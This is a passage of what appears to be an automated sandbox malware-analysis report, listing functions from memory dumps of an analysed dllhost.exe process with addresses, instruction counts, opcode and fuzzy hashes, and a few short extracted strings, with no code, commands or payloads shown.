Opcode ID: 315d70ebe9ccf66425d83b1bd030e15c31d0d51f71aeb13955e45899bca9fea4
Instruction ID: dfc26bb2076e38f79d89790b02a3f549b9b79b38d2e3cbbf5c1307eeb5a498ab
Opcode Fuzzy Hash: 315d70ebe9ccf66425d83b1bd030e15c31d0d51f71aeb13955e45899bca9fea4
Instruction Fuzzy Hash: FB019235A0E38D9FD722EBA4C8501AC7FB0EF02710F1641E7D454DB2A2D9786A458780

Function 00007FFD9BAC6355 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218d391685b21bf97cc37a4625a7a06d145f34d5bc2d4f59eb5f5e96d39265b2
Instruction ID: 7298fff0f7435f4ca275dd884781c471558036d0dd2a18d2c5633c84f0ffadca
Opcode Fuzzy Hash: 218d391685b21bf97cc37a4625a7a06d145f34d5bc2d4f59eb5f5e96d39265b2
Instruction Fuzzy Hash: A5F0E130648A188FDF54EF48C499EA973B1FBB8301F114199D44AD72A1DB74EAC4CF41

Function 00007FFD9BAC0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd6255fdde39fd7e51b51d2b023a362e1aa6afff8e5b47966602c4f4736011f
Instruction ID: 2631a2eee4f71363b7ee3f4ea8f5c7288d83838107816ffb59ee85cf9327d0f8
Opcode Fuzzy Hash: 9dd6255fdde39fd7e51b51d2b023a362e1aa6afff8e5b47966602c4f4736011f
Instruction Fuzzy Hash: 95F0A03925A14DCFC741AB7CC8A44D5BBA0FF07224B4502EAD0888B5A2D321686DCB01

Function 00007FFD9BAC3C50 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction ID: 9e2d678ae3bc11ef4aaf512708dd09d8821d60d1399920d84545f3f6770f2a40
Opcode Fuzzy Hash: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction Fuzzy Hash: 61E01221F0911E4BFB74BB94C8603BA6191AF94300F220075D50DA33E2DDB86E418B44

Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction ID: 367f34ee4ede4f3344eae2c8e7aa65f484e28e883d594cffae12e6f4d9fb499f
Opcode Fuzzy Hash: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction Fuzzy Hash: 60C04C45F5B51F01F83577EE54660BCB1405BD5A10FD70172D55D820F19CDE23D5015E

Function 00007FFD9BAC05D5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction ID: adaa22a799d21af13dea230c5cc1e8417e2cb901a935a44e57247e3c1ac49936
Opcode Fuzzy Hash: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction Fuzzy Hash: EEB09238E9BA0E81DA3937B58C620787150AF45205FE602B5D409811A5E8EE56E64242

Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction ID: 4d052e2a63690639fcd871327d287b8e23216d10027c160b1f9aa2018b2b5ba7
Opcode Fuzzy Hash: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction Fuzzy Hash: BFB01244D5740F01E83433FB089207870405B44100FC301B0D40D820A198CE13D40246

Non-executed Functions

Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 189COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FFD9BAC0B4E
c9, xrefs: 00007FFD9BAC0B56
#{9, xrefs: 00007FFD9BAC0B3E
"s9, xrefs: 00007FFD9BAC0B46

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: c9c3c36f248e70fe532d8adb05ba6551bac3cd8e2eb372142f076904cc2f9895
Instruction ID: 30253344944cce8f34e13f3fb5f163a769e7e5ec9a4bf3de2dd3f1cfb8273698
Opcode Fuzzy Hash: c9c3c36f248e70fe532d8adb05ba6551bac3cd8e2eb372142f076904cc2f9895
Instruction Fuzzy Hash: 75516E06B0A46A45E33977FD78219FD6B449FA923FB0843B7F85E8E0C74D486085C2E9

Analysis Process: dllhost.exePID: 4336, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9BAC0B3F Relevance: 3.0, Strings: 1, Instructions: 1758COMMON

Download Yara Rule

Strings

X_L, xrefs: 00007FFD9BAC19D4

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bac0000_dllhost.jbxd

Similarity

API ID:
String ID: X_L
API String ID: 0-1847528528
Opcode ID: e33e9507c5c14e2300863e85169b23191f2be063921cbe8b4fe6b0c75d5e2840
Instruction ID: 79bc006880073ccd9eafa52646bf8eee795dc0b10e919b7d150cbdade5840c90
Opcode Fuzzy Hash: e33e9507c5c14e2300863e85169b23191f2be063921cbe8b4fe6b0c75d5e2840
Instruction Fuzzy Hash: 2AC2E431F1995E4FEBA8EB5884B16B87392FFA8340F0505B9D41DC72E6DE74AD428B40

Function 00007FFD9BAE14E5 Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e07e4906970f8f20fd07e98ff5cc9eed6751129108bf7c951995c1edea6dfe0
Instruction ID: e2e705ea779bbbf4094baef1a677bb5e4003c3ff8edcf5a99f5758156099f2b9
Opcode Fuzzy Hash: 8e07e4906970f8f20fd07e98ff5cc9eed6751129108bf7c951995c1edea6dfe0
Instruction Fuzzy Hash: 20C1CF21F2E69E0BE32D5B684C920B577D1EBA2309B19877DD4DBC3097D978A507C2C1

Function 00007FFD9BAB0D77 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 714fd48bf8f0f7592df857d3b5beca5a331959eb2e0dd2db7b52a0aca8036f0b
Instruction ID: ae5a36d79767604f4fee60a4891e323ca8cb915f29e7ae32acbe16a2519f5ab7
Opcode Fuzzy Hash: 714fd48bf8f0f7592df857d3b5beca5a331959eb2e0dd2db7b52a0aca8036f0b
Instruction Fuzzy Hash: DF91D172A18A9D4FE759DB68C8797E87FE0FF99318F4001BED059C76E6CAB414008B40

Function 00007FFD9BADAC9C Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

E, xrefs: 00007FFD9BADC043

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 2fc8345e50d1e7881228a8d89397cd2f598e0c84bc63fcd9bdff3bc9cfce1bd0
Instruction ID: 7a002ebcbc535a7fb35fb1b460ce7d0ecbd993c5ffc26d751c4edd754788451e
Opcode Fuzzy Hash: 2fc8345e50d1e7881228a8d89397cd2f598e0c84bc63fcd9bdff3bc9cfce1bd0
Instruction Fuzzy Hash: 73717D31A1DB898BE774DF58C4517AAB3E1FFC8310F514A3DD58DC32A2DA78A9418B42

Function 00007FFD9BADAD02 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

1, xrefs: 00007FFD9BADB329

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: 1
API String ID: 0-2212294583
Opcode ID: a3e7f53b368505b7ed4f9a1d066269d5465c858be5428adf02579f61ae48009c
Instruction ID: e23a110405bf5c2811acb4d8edc3ce1035f4a4b8f91827bfa62ddaaba18a0613
Opcode Fuzzy Hash: a3e7f53b368505b7ed4f9a1d066269d5465c858be5428adf02579f61ae48009c
Instruction Fuzzy Hash: C9115E31A1CB948BD738DF18C8417AAB7E1FBD8710F154A2ED18E93261CB34B9418B83

Function 00007FFD9BAD98D1 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAD98B6

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: f943848c894d3ad265338dfa9560f82679cff4188a50ca64e2f0cedf75f2c5bc
Instruction ID: 38d604f337659fc0edf173207e66b235a5da460cbe1f83b8ec6c2bf712ccb239
Opcode Fuzzy Hash: f943848c894d3ad265338dfa9560f82679cff4188a50ca64e2f0cedf75f2c5bc
Instruction Fuzzy Hash: 5211A571A0E7CC4FDB169BB488698987FB0EF96210B4A41FFD449CB1B3E9298949C701

Function 00007FFD9BADE7A9 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BADE816

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: cc53a91e082cb30e89aeeaf8daa2af7e9998c4d357e806cf0bff1e14bec5f9f9
Instruction ID: 62822c0de5ca67075f6d54d4fa527cbea6663e6a7c018bdc00e5453dc961a612
Opcode Fuzzy Hash: cc53a91e082cb30e89aeeaf8daa2af7e9998c4d357e806cf0bff1e14bec5f9f9
Instruction Fuzzy Hash: 2E01FE31F0A58C4FCB65EBB484688E9BFA0EF96240F4642FED449CB166ED399646C740

Function 00007FFD9BADE7F9 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BADE816

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 737010da9d4ad085a135564e19cdacf666033f412328eb61ea4f45582ef6dbc6
Instruction ID: 080fe07a339f157f4ff78dc2c1fb88dd11b1594846fe35ce128a7e642e93bec4
Opcode Fuzzy Hash: 737010da9d4ad085a135564e19cdacf666033f412328eb61ea4f45582ef6dbc6
Instruction Fuzzy Hash: C7E0D17164E3C44FC716D63544644557F60DF6720174642FEC045CF1A7EA2DCC46C701

Function 00007FFD9BAE33A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAE33C6

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 9f690744497b5bb53126d0db688e66113aebace32011fac5521a4cdb06722eef
Instruction ID: 7de40fcb7ff32424f770444b176986cc69663104732be1f41a6eb94e8a35e081
Opcode Fuzzy Hash: 9f690744497b5bb53126d0db688e66113aebace32011fac5521a4cdb06722eef
Instruction Fuzzy Hash: C9E0656160E7C44FC71AE6344869855BFB0EF6721174A51EFC045CF1A3DA1D9889C701

Function 00007FFD9BAEA9D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAEA9F6

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 007e3df9521155be49c756fd29a13c3b473c42b8900e035d85853915521b17c4
Instruction ID: c6d49b0f511954a5ae7448deb4591acf2a411de13f40867a7f31c5067b29252c
Opcode Fuzzy Hash: 007e3df9521155be49c756fd29a13c3b473c42b8900e035d85853915521b17c4
Instruction Fuzzy Hash: EEE06D6160E7C48FC71AAA348869454BFA0EF6720174A42EFC046CF1A3EA2D8889C701

Function 00007FFD9BAE20C9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAE20E6

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: fa92e7fdb5960d4ce912bf27ccaa558049c1374ab65a53a9389839d779c47e61
Instruction ID: d847278311ac6b55d43ad3dceaecaa2aae25a679324a48d0ac4403402d7abdf9
Opcode Fuzzy Hash: fa92e7fdb5960d4ce912bf27ccaa558049c1374ab65a53a9389839d779c47e61
Instruction Fuzzy Hash: 3DE0927160E3C44FCB16EA348868455BF60EF6721174A41FFC046CF2A7EA2DC885C702

Function 00007FFD9BAEAE99 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAEAEB6

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 0a9dd156eecf72af7a9cd16c811bf7d1dde3cbc50340ea33d0bb3f89e9403431
Instruction ID: 3276e08f25807a97b74ef6c3d61bb71d714b2bc34f87fad7ec6d2bfdfe81b128
Opcode Fuzzy Hash: 0a9dd156eecf72af7a9cd16c811bf7d1dde3cbc50340ea33d0bb3f89e9403431
Instruction Fuzzy Hash: 36E04F7194A7C44FCB16EB7484AA8553FA0DE6721078B40EEC545CF1B3E62D8849C701

Function 00007FFD9BAE86F9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAE8716

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 91de29063f1aa8dc52c48ff4caf55f7eca5be1c13e96bf99d06e98a73892c095
Instruction ID: fe878b7a60ecc1febe06ee879ef327eaf7921f95cbb9dffcf20019753fe82dfd
Opcode Fuzzy Hash: 91de29063f1aa8dc52c48ff4caf55f7eca5be1c13e96bf99d06e98a73892c095
Instruction Fuzzy Hash: B1E01A6154F3C44FCB16EB7488A98457FA09E6721078A40EEC145CF1B7E62D8849C701

Function 00007FFD9BAE2159 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAE2176

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 4b30783aaca1b5e517c2d333088832db9f67ca1709af667f80765a9635ce9bc0
Instruction ID: 094b3cd1c253802985ce8d4b7b5d0e7dfb06f08cb8c6af458f28737b16b483d1
Opcode Fuzzy Hash: 4b30783aaca1b5e517c2d333088832db9f67ca1709af667f80765a9635ce9bc0
Instruction Fuzzy Hash: 5EE01A6154E3C08FCB0AEB7888699457F60AE6721178B41EEC08ACF1B3E62D8949C711

Function 00007FFD9BAD9A49 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAD9A66

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 7db00f5ae26aa7976d9af7f79c90981069e9fcb9f43661c7a0c69122905aa749
Instruction ID: 80e84711b1558c722c3202b132d1c7afcecf2c9a8feaaf0675169ebbed73ae91
Opcode Fuzzy Hash: 7db00f5ae26aa7976d9af7f79c90981069e9fcb9f43661c7a0c69122905aa749
Instruction Fuzzy Hash: 8EE01A7164F7C44FCB5AEB74886A9447FA0AE6721178B41EEC085CF1B3E62D8949C701

Function 00007FFD9BAD9899 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAD98B6

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 77c651f864c58c844e0dbb965f48262b852d7407f11c2742787d566ab9fe5095
Instruction ID: 17745f97f8fe8f9ccfb9d27118ade288a009ef986a54285a74a5a29496871800
Opcode Fuzzy Hash: 77c651f864c58c844e0dbb965f48262b852d7407f11c2742787d566ab9fe5095
Instruction Fuzzy Hash: 29E01A6154E3C44FCB1AEB7488658853F609E6721078B40EEC145CF1B7E62DC949C701

Function 00007FFD9BAD9A81 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554a7d85823d3bf5f46c38dba145f01bb8c4dc6e4f077524dc502abd4c2e6c71
Instruction ID: 2be4104600a49a2ee7a75b5d9480e4084e3388caca57902c8a4762c4ced7812e
Opcode Fuzzy Hash: 554a7d85823d3bf5f46c38dba145f01bb8c4dc6e4f077524dc502abd4c2e6c71
Instruction Fuzzy Hash: 84A1C231B1894D4FDB58EF68C4A8AA977E2FF98314B510679E41EC72E6CF34A8428740

Function 00007FFD9BAE383D Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a863d7bbb126167e9d1e85c6b2d3f0642e22ab1f4a3e682364bf940373c0f35
Instruction ID: afb461fb5ed096f06f7c0cf5e505d61a7b9868a2740c472f8aa527986c612c2e
Opcode Fuzzy Hash: 2a863d7bbb126167e9d1e85c6b2d3f0642e22ab1f4a3e682364bf940373c0f35
Instruction Fuzzy Hash: 5E915921B2DA4E0FEBACEB6884757B873C2EF98354F4542B9D40DC72D7DE68A9458340

Function 00007FFD9BAE47DD Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661e454f1e37340c5c3efe66027164dc7be0aaa3c2208d5cac278fe65777e8d3
Instruction ID: 78cb0286cc90159ba4f061640498c1611392e3ed02c0e3a55d57940070499432
Opcode Fuzzy Hash: 661e454f1e37340c5c3efe66027164dc7be0aaa3c2208d5cac278fe65777e8d3
Instruction Fuzzy Hash: D781D131E1DA1D8FEB689F58D8967B973E4EB58710F1104B9D40D932A2CE747E818BC1

Function 00007FFD9BAE27BE Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0655d8d75de8342ffd702b4b81c2a8f0ea18ad9ffd3a3ed06e93983f3d900773
Instruction ID: 3a4c07f17bb7c89a8e615c4820671bdf239d6ad09eb9d4efd6da38cf9b194def
Opcode Fuzzy Hash: 0655d8d75de8342ffd702b4b81c2a8f0ea18ad9ffd3a3ed06e93983f3d900773
Instruction Fuzzy Hash: 1641E931B0DA1D4FEB68DBC8D4A57F873D1EB98320F15417AD40ED32A2DEA46D468780

Function 00007FFD9BAB08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8af9ae6915cfafa8bf7dca698d2d6647467d974b2fa55435e13dc94846aab1a
Instruction ID: a658c62dd90a0a07c91463e8cbc4a2cfd2804004bb9a9aa1a5be94fb33716354
Opcode Fuzzy Hash: b8af9ae6915cfafa8bf7dca698d2d6647467d974b2fa55435e13dc94846aab1a
Instruction Fuzzy Hash: 46411922B0C5690EE328F7ACA4A56FD7781DF9933EF0405BBE45DCB1D7CD1868418684

Function 00007FFD9BAB11A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b7eb406f28d5d7e53361c291efce6e2f99dc766acdbefcda78d7a85b6c4ad9
Instruction ID: 0a2475ec7ea0b2f180a9431a89c5c209d87bdfcc95cd05320cae14a7b5ea87ed
Opcode Fuzzy Hash: 89b7eb406f28d5d7e53361c291efce6e2f99dc766acdbefcda78d7a85b6c4ad9
Instruction Fuzzy Hash: 50319430A1E69E8FDB55EB68C8649A87BF0EF66300F0505BBC059C71E3DE68A941CB50

Function 00007FFD9BAB0998 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ed41817033cf16aa3cd00b1a2a30dbd583c8000ade4983742ca41b6ef75953
Instruction ID: 98810842d5dcb6d3374b4d5bc80aaf8a03815b78ebfb611f9a2cd83a6e31413b
Opcode Fuzzy Hash: 41ed41817033cf16aa3cd00b1a2a30dbd583c8000ade4983742ca41b6ef75953
Instruction Fuzzy Hash: AF213A20B1D92D0FE798B76C947A7B972D2EF98325F4501BAE80DC32E6DC54AC024685

Function 00007FFD9BAEB260 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f019aa27e24137c8a1ccbdb1b5b10e331a66e061196edc893d8a576271f82b
Instruction ID: 95e5f1290c432f2a307bdf973c6600c3a730bebe7d504bc279966895bb8c15ad
Opcode Fuzzy Hash: f9f019aa27e24137c8a1ccbdb1b5b10e331a66e061196edc893d8a576271f82b
Instruction Fuzzy Hash: F131A420A0E3CE4FD7239BB488681E97FB0EF53210F0A41EBD494CB1A3D9A81649C752

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c879cc3aa8b2ddb4af0ee2fa5b1dc514919801c84fbd2e51747bdc5aab76dc9c
Instruction ID: 7d6501555d1daf565ae9d902f12ac9f2ffdb720ee450a2d01f8c932db254188a
Opcode Fuzzy Hash: c879cc3aa8b2ddb4af0ee2fa5b1dc514919801c84fbd2e51747bdc5aab76dc9c
Instruction Fuzzy Hash: 5A314831B0D25D8FE332ABA988652EC7B60EF52325F0581B7D0288B1D3DA782645CB84

Function 00007FFD9BAE9B44 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74dcef4b419b7f5ce9045f6751ccad1737382c3c68d56c516673f8cdaeeeba65
